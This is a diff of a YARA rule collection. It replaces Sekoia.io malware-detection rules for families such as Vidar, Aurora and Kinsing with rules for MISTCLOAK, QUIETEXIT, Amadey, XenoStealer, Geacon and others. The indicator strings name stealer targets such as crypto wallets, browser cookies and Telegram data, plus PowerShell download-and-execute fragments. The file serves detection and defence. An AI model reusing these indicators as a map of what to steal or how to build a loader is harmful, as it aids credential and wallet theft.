+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/implant_win_mysterysnail.yar#L4-L27"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "37c02a5916ad7ce3190ce926d576365d1e17fee0f10e9b31619ea4b6fee29ae6"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "9dc04153455d054d7e04d46bcd8c13dd1ca16ab2995e518ba9bf33b43008d592"
-		hash2 = "c2904dc8bbb569536c742fca0c51a766e836d0da8fac1c1abd99744e9b50164f"
-		hash3 = "f6827dc5af661fbb4bf64bc625c78283ef836c6985bb2bfb836bd0c8d5397332"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 15MB and for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "39dfb9f035cba21ffd90973904f90469" and pe.sections [ i ] . name == ".qtmetad" )
+		uint16( 0 ) == 0x5A4D and ( pe.imphash ( ) == "de0c9e6aec27d278ccdb6718b3e96e32" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "a41b6fb1cc34d6393e30c13a58f6ecd4" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "f263a2be76694feab7e2ce79ecf8b724" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "e9056ae96619d7aa18daa973da592afc" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "3e38e89e9e8329f5cff8a7022d88fff7" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "ce78f8599167c63e8f1c8d3e789c4a60" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "456d4f1096bf5c72cd6e1e3eb9980ec6" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "37e2bff637001fc64566fe651757f66e" ) or hash.md5 ( pe.rich_signature.clear_data ) == "e4116fffa240ba6d91b400541ce85182" )
 }
-rule SEKOIA_Apt_Polonium_Powershell_Creepydrive_Strings
+
+rule SEKOIA_Launcher_Win_Mistcloak : FILE
 {
 	meta:
-		description = "Detects POLONIUM CreepyDrive Powershell implant"
+		description = "Detect the MISTCLOAK malware"
 		author = "Sekoia.io"
-		id = "0ba196bd-9cd6-4553-b7bf-69989cdb8be4"
-		date = "2022-06-03"
+		id = "3dbf5efa-d77c-436a-a080-9ac58a78425f"
+		date = "2022-12-01"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_polonium_powershell_creepydrive_strings.yar#L1-L24"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "28b8f10a36d13e97e606b082f20c50c3d48241409e7f1aca621e2af9d756dbe5"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/launcher_win_mistcloak.yar#L4-L33"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "fc2731ec4e2917be1ad169908ed324931a93f6998aee606319750b5cc02715e2"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "function Exec($comm)" base64 ascii wide
-		$ = "$comm = $comm + \"| outstring" base64 ascii wide
-		$ = "Invoke-Expression -Command:$comm" base64 ascii wide
-		$ = "microsoft.com" base64 ascii wide
-		$ = "$req = Invoke-WebRequest" base64 ascii wide
-		$ = "$j += $data" base64 ascii wide
-		$ = "$res = Exec($arr[$i])" base64 ascii wide
-		$ = "$arr = @(iex \"$req\")" base64 ascii wide
-		$ = "elseif ($req -cmatch" base64 ascii wide
-		$ = "graph.microsoft.com" base64 ascii wide
+		$ = "\\usb.ini"
+		$ = "autorun.inf\\Protection for Autorun\\System Volume Information"
+		$ = "G:\\project\\APT\\U"
+		$ = "\\new\\u2ec\\Release\\u2ec.pdb"
+		$ = "CheckUsbService"
 
 	condition:
-		3 of them
+		uint16( 0 ) == 0x5A4D and 3 of them or hash.md5 ( pe.rich_signature.clear_data ) == "0f5082fd7ddd1950fa332a8fa4df052f" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "0ceac625db1e8405efe45d47486e9e2d" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "6968e6ac7b9c1dfbf40a0b3c4f6f4157" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "e6ed2da41f74e948cba7a002c41c6af5" )
 }
-rule SEKOIA_Infostealer_Win_Aurora : FILE
+rule SEKOIA_Apt_Apt37_Chinotto_Powershell_Variant
 {
 	meta:
-		description = "Finds Aurora samples based on characteristic strings"
+		description = "Detects APT37 Chinotto Powershell Variant"
 		author = "Sekoia.io"
-		id = "22ae81b4-647f-4b46-9b2a-dd96e0615d65"
-		date = "2022-11-15"
+		id = "fa42b225-58fe-4e00-b84b-df37491d8fdd"
+		date = "2023-03-06"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_aurora.yar#L1-L35"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "e88cbb012ffb65aa8a70b76163a834c0bc4615b0effc93945c6d915e33c04549"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_apt37_chinotto_powershell_variant.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "b4d17467f15d52bd615e335fa8bc31381ec273b67dabb74655f47179f04f631f"
 		score = 75
-		quality = 78
-		tags = "FILE"
+		quality = 80
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str00 = "I'm a teapot" ascii
-		$str01 = "wmic cpu get name" ascii
-		$str02 = "wmic path win32_VideoController get" ascii
-		$str03 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones" ascii
-		$str04 = "Exodus\\exodus.wallet" ascii
-		$str05 = "PaliWallet" ascii
-		$str06 = "cookies.sqlite" ascii
-		$str07 = "Startup\\Documents\\User Data" ascii
-		$str08 = "atomic\\Local Storage\\leveldb" ascii
-		$str09 = "com.liberty.jaxx\\IndexedDB" ascii
-		$str10 = "Guarda\\Local Storage\\leveldb" ascii
-		$str11 = "AppData\\Roaming\\Telegram Desktop\\tdata" ascii
-		$str12 = "Ethereum\\keystore" ascii
-		$str13 = "Coin98" ascii
-		$str14 = ".bat.cmd.com.css.exe.gif.htm.jpg.mjs.pdf.png.svg.xml.zip" ascii
-		$str15 = "type..eq.main.Grabber" ascii
-		$str16 = "type..eq.main.Loader_A" ascii
-		$str17 = "type..eq.net/http.socksUsernamePassword" ascii
-		$str18 = "powershell" ascii
-		$str19 = "start-process" ascii
-		$str20 = "http/httpproxy" ascii
+		$ = "$env:COMPUTERNAME + '-' + $env:USERNAME;" ascii wide
+		$ = "while($true -eq $true)" ascii wide
+		$ = "Start-Sleep -Seconds" ascii wide
+		$ = " -ne 'null' -and $" ascii wide
+		$ = "= 'R=' + [System.Convert]::" ascii wide
+		$ = "[string]$([char]0x0D) + [string]$([char]0x0A);" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 15 of them and filesize > 4MB
+		4 of them
 }
-rule SEKOIA_Apt_Badmagic_Commonmagic_Main : FILE
+rule SEKOIA_Apt_Unc3524_Quietexit_Strings : FILE
 {
 	meta:
-		description = "Detects CommonMagic related implants"
+		description = "Detect the QUIETEXIT malware used by UNC3524"
 		author = "Sekoia.io"
-		id = "99983df5-89d6-4fac-81e6-16e5ab20bde3"
-		date = "2023-05-15"
+		id = "1bfa9baa-40a3-4ad7-83dc-f9340fbed180"
+		date = "2022-05-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_badmagic_commonmagic_main.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "9bcfd6e9e150399c7f11abc41205119ddf24ea0fef5816ed905cd9b1e9ec5c1e"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_unc3524_quietexit_strings.yar#L1-L23"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "9f8bc7516fdefd94c6bddaf77ea3ac1ba8a3a6380530118c4b28d74b42eaae54"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -239874,25 +240637,31 @@ rule SEKOIA_Apt_Badmagic_Commonmagic_Main : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "graph.microsoft.com" ascii wide
-		$ = "children?select=name,size" ascii wide fullword
-		$ = "\\\\.\\pipe\\PipeCrDtMd" ascii wide fullword
+		$ = "Child connection from %s:%s" ascii
+		$ = "Failed to run %s" ascii
+		$ = "add %s %s %s" ascii
+		$ = "/usr/bin/xauth -q" ascii
+		$ = "/tmp/dropbear-%" ascii
+		$ = "cron" ascii
+		$ = { DD E5 D5 97 20 53 27 BF F0 A2 BA CD 96 35 9A AD 1C 75 EB 47 }
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and all of them
+		uint32be( 0 ) == 0x7f454c46 and filesize > 1MB and 5 of them
 }
-rule SEKOIA_Bot_Lin_Kinsing_Strings : FILE
+rule SEKOIA_Apt_Gamaredon_Htmlsmuggling_2024 : FILE
 {
 	meta:
-		description = "Catch Kinsing malware based on strings"
+		description = "Detects HTML Smuggling webpages of Gamaredon used in 2024"
 		author = "Sekoia.io"
-		id = "ce41b6d0-bc22-4a85-a3bb-ed3234871524"
-		date = "2023-11-24"
+		id = "8fa1f80b-2261-4d63-92d8-7c360be73fe2"
+		date = "2024-09-09"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/bot_lin_kinsing_strings.yar#L1-L23"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "164b22734541d43047a2ea868cf0a269efe69c64a6392030168f4d391b1be777"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_gamaredon_htmlsmuggling_2024.yar#L1-L23"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "ab2807824e68d5efb4c896e1af82e693"
+		hash = "926b7e65d0d61cd6ba9e085193ae8b1d"
+		logic_hash = "9cd82f497fd7b82f02fec4ce1d131cd2685861c7c02aaae992e07a7d8bd30595"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -239900,35 +240669,29 @@ rule SEKOIA_Bot_Lin_Kinsing_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "MinerUrl" ascii
-		$s2 = "main.masscan" ascii
-		$s3 = "redisBrute" ascii
-		$s4 = "ActiveC2CUrl" ascii
-		$s5 = "main.getKi" ascii
-		$s6 = "main.getMu" ascii
-		$s7 = "tryToRunMiner" ascii
-		$s8 = "main.kiLoader" ascii
-		$s9 = "main.downloadAndExecute" ascii
+		$ = "').innerHTML;window['" ascii fullword
+		$ = "='at'+'ob';"
+		$ = "]('*','');"
+		$ = "display:none"
+		$ = "0px;\" onerror=\""
+		$ = "'ev'+'"
+		$ = "<!DOCTYPE html PUBLIC"
 
 	condition:
-		uint32( 0 ) == 0x464c457f and all of them
+		5 of them and filesize < 1MB
 }
-rule SEKOIA_Apt_Icepeony_Iceevent : FILE
+rule SEKOIA_Apt_Tortoiseshell_Wateringhole_Script : FILE
 {
 	meta:
-		description = "Detects IceEvent Backdoor"
+		description = "Detect's Tortoiseshell WH script"
 		author = "Sekoia.io"
-		id = "7d1f8b90-fde4-4d5c-a8a3-375db8aa88a1"
-		date = "2024-10-21"
+		id = "58c5ae66-fe09-497c-80bf-20feee4d95e7"
+		date = "2023-05-24"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_icepeony_iceevent.yar#L1-L24"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "07c291c9cea4430676c303128bbbb8e3"
-		hash = "489b573b37ab8bc74cca3704e723b895"
-		hash = "265f6cf778d26e62903fb295f89507e3"
-		hash = "f5eb28dd29c91cc84818b74d7f138ff6"
-		logic_hash = "8afe4a94513e9aa5d20849153c76cfe5c684c9a529710947930c76098a36540e"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_tortoiseshell_wateringhole_script.yar#L1-L22"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "8ad886443b1bd17048054b57650d38cda1ffccc10fedfac86283a41daf956dc2"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -239936,27 +240699,30 @@ rule SEKOIA_Apt_Icepeony_Iceevent : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Created a process" ascii fullword
-		$ = "CreateProcess failed: %d"
-		$ = "bind error:"
-		$ = "Error creating pip: %d"
-		$ = "listen error:"
+		$ = "btoa(pluggin.toString())"
+		$ = "btoa(document.referrer)"
+		$ = "pluggin.push(navigator.plugins[i]"
+		$ = "navigator.language"
+		$ = "window.RTCPeerConnection"
+		$ = "sha256(canvas.toDataURL("
+		$ = "canvas.getContext('2d"
+		$ = "noop = function() {},"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 4 of them and filesize < 500KB
+		5 of them and filesize < 10000
 }
-rule SEKOIA_Apt_Oilrig_Powerexchange : FILE
+rule SEKOIA_Apt_Gamaredon_Doc_External_Template : FILE
 {
 	meta:
-		description = "Detects OilRig's PowerExchange backdoor"
+		description = "Detects malicious templates used by Gamaredon"
 		author = "Sekoia.io"
-		id = "cb6b370f-7b05-480b-865e-ac81ded4a2a4"
-		date = "2023-10-24"
+		id = "5f6bbf92-2fdf-428d-af49-2d3e754c29d7"
+		date = "2023-01-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_oilrig_powerexchange.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "5e505e9bbb17500f7e9a316b66bccb62089172582478230e0bda736bbefa1fd6"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_gamaredon_doc_external_template.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "51412081fa7e62fa342b0ed6da18009b39e3952286f2bd319fbe10e0b1761e02"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -239964,27 +240730,25 @@ rule SEKOIA_Apt_Oilrig_Powerexchange : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "($h.value).PadRight((($h.value).Length+($h.value).Length%4),'='" ascii wide
-		$ = "(($h.value).Length%4 -ne 0)" ascii wide
-		$ = "-match \"@@(.*)@@\"" ascii wide
-		$ = "[Environment]::NewLine+$_.Exception.Message | Out-File -FilePath" ascii wide
-		$ = "ContainsSubjectStrings.Add(\"@@\")" ascii wide
+		$ = "USERPROFILE" ascii
+		$ = "msxml2" ascii
+		$ = "T24gRXJyb3IgUmVzdW1lIE5leHQ" ascii
 
 	condition:
-		2 of them and filesize < 50KB
+		uint32be( 0 ) == 0xd0cf11e0 and filesize < 100KB and all of them
 }
-rule SEKOIA_Apt_Oilrig_Sc5Kv3_Strings : FILE
+rule SEKOIA_Loader_Amadey_Standalone_May23 : FILE
 {
 	meta:
-		description = "Detects SC5kv3 malware based on strings"
+		description = "Finds standalone samples of Amadey based on characteristic strings"
 		author = "Sekoia.io"
-		id = "885ea13b-47b0-4a6d-8136-9b31abc9064a"
-		date = "2023-12-20"
+		id = "5013586c-5ac3-4c1a-a82e-edce4889eedc"
+		date = "2023-05-17"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_oilrig_sc5kv3_strings.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "ace8e227abd97d0ec21815cc58c24d46e4944f2b0e1987672be53f81356a7a57"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/loader_amadey_standalone_may23.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "40d2d7a52066ca4e1a65c82ebfa882a77616a1c68f1d315946ab14467787d468"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -239992,120 +240756,155 @@ rule SEKOIA_Apt_Oilrig_Sc5Kv3_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "no-reply this email!" ascii wide
-		$ = "The serial is " ascii wide
+		$str01 = "\\Amadey\\Release\\Amadey.pdb" ascii
+		$hex01 = { 6E 74 64 6C 6C 2E 64 6C  6C 00 00 00 72 75 6E 61 73 }
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 5MB and all of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule SEKOIA_Infostealer_Win_Vidar_Str_Jul22 : FILE
+rule SEKOIA_Infostealer_Win_Xenostealer_Strings : FILE
 {
 	meta:
-		description = "Detect the Vidar infostealer based on specific strings"
+		description = "Finds XenoStealer standalone samples based on the strings"
 		author = "Sekoia.io"
-		id = "1dc18694-aaac-41e6-979a-c06d5d62f5ea"
-		date = "2022-07-26"
+		id = "0a41788b-1fa7-44ff-af85-9c1ff1892aad"
+		date = "2024-10-30"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_vidar_str_jul22.yar#L1-L29"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "394d148155d46753df188a252678c5ce9d0aa321da8907e74b844d5aa8494a47"
+		reference = "https://github.com/moom825/XenoStealer/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_xenostealer_strings.yar#L1-L35"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "b74733d68e95220ab0630a68ddf973b0c959fd421628e639c1b91e465ba9299b"
+		logic_hash = "1c48b15b8e9648c1c4d2f9c0a9ee3f4c48605fa44772b87a03ad81923e5adf15"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
-		modification_date = "2022-08-23"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "vcruntime140.dll" ascii
-		$str02 = "\\screenshot.jpg" ascii
-		$str03 = "HARDWARE\\DESCRIPTION\\System\\CentralProcessor" ascii
-		$str04 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall" ascii
-		$str05 = "%s\\%s\\%s\\chrome-extension_%s_0.indexeddb.leveldb" ascii
-		$str06 = "\\CC\\%s_%s.txt" ascii
-		$str07 = "\\Autofill\\%s_%s.txt" ascii
-		$str08 = "\\History\\%s_%s.txt" ascii
-		$str09 = "\\Downloads\\%s_%s.txt" ascii
-		$str10 = "Content-Disposition: form-data; name=" ascii
-		$str11 = "Exodus\\exodus.wallet" ascii
-		$str12 = "*%DRIVE_REMOVABLE%*" ascii
-		$opc = {55 8b ec 51 56 8b 75 ?? 33 c0 c7 46 14 ?? ?? ?? ?? 89 46 ?? 68 ?? ?? ?? ?? 8b ce 89 45 ?? 88 06 e8 1f b6 ff ff 8b c6 5e c9 c2 ?? ??}
+		$str01 = "XenoStealer" ascii wide
+		$str02 = "$d05de59c-9ee5-4e7e-abb5-8f2cc3f72cd1" ascii
+		$str03 = "SteamInfo" ascii
+		$str04 = "TelegramInfo" ascii
+		$str05 = "NgrokInfo" ascii
+		$str06 = "pAuthInfo" ascii
+		$str07 = "FoxMailInfo" ascii
+		$str08 = "_hasNitro" ascii
+		$str09 = "_games" ascii
+		$str10 = "_profiles" ascii
+		$str11 = "_cookies" ascii
+		$str12 = "_creditCards" ascii
+		$str13 = "_cryptoExtensions" ascii
+		$str14 = "_passwordManagerExtensions" ascii
+		$str15 = "ChromiumBrowsersLikelyLocations" ascii
+		$str16 = "EdgeCryptoExtensions" ascii
+		$str17 = "ChromePasswordManagerExtensions" ascii
+		$str18 = "GeckoBrowserOptions" ascii
+		$str19 = "get_programFiles" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( 7 of them or $opc )
+		uint16( 0 ) == 0x5A4D and 15 of them
 }
-rule SEKOIA_Tool_Pivotnacci
+rule SEKOIA_Implant_Lin_Geacon : FILE
 {
 	meta:
-		description = "Detects Pivotnacci"
+		description = "Finds Geacon samples based on specific strings"
 		author = "Sekoia.io"
-		id = "31ecb08a-fc92-4cbe-a865-7ce869a5fa6a"
-		date = "2024-04-22"
+		id = "ad71522e-270b-47d0-9c01-081f05a2b72a"
+		date = "2024-01-11"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_pivotnacci.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "b0e4bc997775fb5ff258a23e07a58b4897a2ce9d3fffab86e93919857e566d18"
+		reference = "https://www.sentinelone.com/blog/geacon-brings-cobalt-strike-capabilities-to-macos-threat-actors/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/implant_lin_geacon.yar#L1-L35"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "c6fa5815bf618eb588d511f18231042944dee20c1b13096c44910d43ca552bfa"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$pivotnacci = "pivotnacci"
-		$s1 = "Socks server => %s:%s"
-		$s2 = "The default listening address"
-		$s3 = "Socks server for HTTP agents"
-		$s4 = "Message returned by the agent web page"
-		$s5 = "Password to communicate with the agent"
-		$s6 = "To specify agent type in case is not automatically detected."
+		$gea01 = "geacon/config.init" ascii
+		$gea02 = "geacon_pro-master/config/config.go" ascii
+		$gea03 = "geacon_plus-main/config/config.go" ascii
+		$gea04 = "command type %d is not support by geacon now" ascii
+		$gea05 = "main/sysinfo.GeaconID" ascii
+		$str01 = "command.StealToken" ascii
+		$str02 = "command.MakeToken" ascii
+		$str03 = "command/misc.go" ascii
+		$str04 = "config/c2profile.go" ascii
+		$str05 = "crypt.AesCBCDecrypt" ascii
+		$str06 = "packet.File_Browse" ascii
+		$str07 = "packet.FirstBlood" ascii
+		$str08 = "packet.ParseCommandShell" ascii
+		$str09 = "packet.ParseCommandUpload" ascii
+		$str10 = "packet.PushResult" ascii
+		$str11 = "sysinfo.GetComputerName" ascii
+		$str12 = "sysinfo.IsOSX64" ascii
+		$str13 = "util..inittask" ascii
 
 	condition:
-		$pivotnacci and 3 of ( $s* )
+		uint32( 0 ) == 0x464C457F and ( ( 1 of ( $gea* ) and 2 of ( $str* ) ) or 8 of ( $str* ) )
 }
-rule SEKOIA_Apt_Andariel_Nestdoor_Variants_Strings : FILE
+rule SEKOIA_Backdoor_Win_Volgmer : FILE
 {
 	meta:
-		description = "Detects Nestdoor based on (weak) strings"
+		description = "Detect the NukeSped variant called Volgmer used by Andariel"
 		author = "Sekoia.io"
-		id = "dcfc48ad-f17b-4224-912b-b01740080fea"
-		date = "2024-06-17"
+		id = "9468a66d-787c-488f-937b-22617c7a2ded"
+		date = "2023-09-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_andariel_nestdoor_variants_strings.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "bc01138d1fc079c2b778175742e121f10cb47f29cc4eb04d38b4f0f5740f05a4"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/backdoor_win_volgmer.yar#L1-L32"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "700fcfcc3df1d81af99db38e305f64ca87f8368fc0149c9ad64d75c2917ec1f3"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "3098e6e7ae23b3b8637677da7bfc0ba720e557e6df71fa54a8ef1579b6746061"
+		hash2 = "7339cfa5a67f5a4261c18839ef971d7f96eaf60a46190cab590b439c71c4742b"
+		hash3 = "8daa6b20caf4bf384cc7912a73f243ce6e2f07a5cb3b3e95303db931c3fe339f"
+		hash4 = "1b88b939e5ec186b2d19aec8f17792d493d74dd6ab3d5a6ddc42bfe78b01aff1"
 
 	strings:
-		$v_11 = "Error occurs while reading" wide
-		$v_12 = "{DECIMAL}" wide
-		$v_13 = "lnk_" wide
-		$v_21 = "Cannot connect with your ip and your operating system." wide
-		$v_22 = "del /q /f %1" ascii
-		$v_23 = "/f /tn %2" ascii
+		$ = "Fixed" wide
+		$ = "CDRom" wide
+		$ = "Removable" wide
+		$ = "%.2fGB" wide
+		$ = "\\*.*" wide
+		$ = "Folder" wide
+		$ = "%.1fKB" wide
+		$ = "%.1fMB" wide
+		$ = "%s\\*.*" wide
+		$ = "%s\\%s\\%s" wide
+		$ = "%s\\%s%s" wide
+		$ = "Remote PC" wide
+		$ = "%s|%s|%s|%s|%s|%s|" wide
+		$ = "%s\\cmd.exe" wide
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and ( all of ( $v_1* ) or all of ( $v_2* ) )
+		uint16be( 0 ) == 0x4d5a and all of them
 }
-rule SEKOIA_Koiloader_Powershell_Reflective_Loading : FILE
+rule SEKOIA_Apt_Lazarus_Pondrat : FILE
 {
 	meta:
-		description = "Powershell script loading service.exe (related to Koi Loader)"
+		description = "Detects PondRAT via mangled command names"
 		author = "Sekoia.io"
-		id = "9bbe4cea-3e64-4377-bf93-def9fb629734"
-		date = "2024-03-20"
+		id = "a957c158-a79a-4d7a-8473-b6960cf02d9b"
+		date = "2024-09-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/koiloader_powershell_reflective_loading.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "27deec01027a73129c6c8057eff1b48190c89ac18dcd7c390fc177d82a897290"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_lazarus_pondrat.yar#L1-L24"
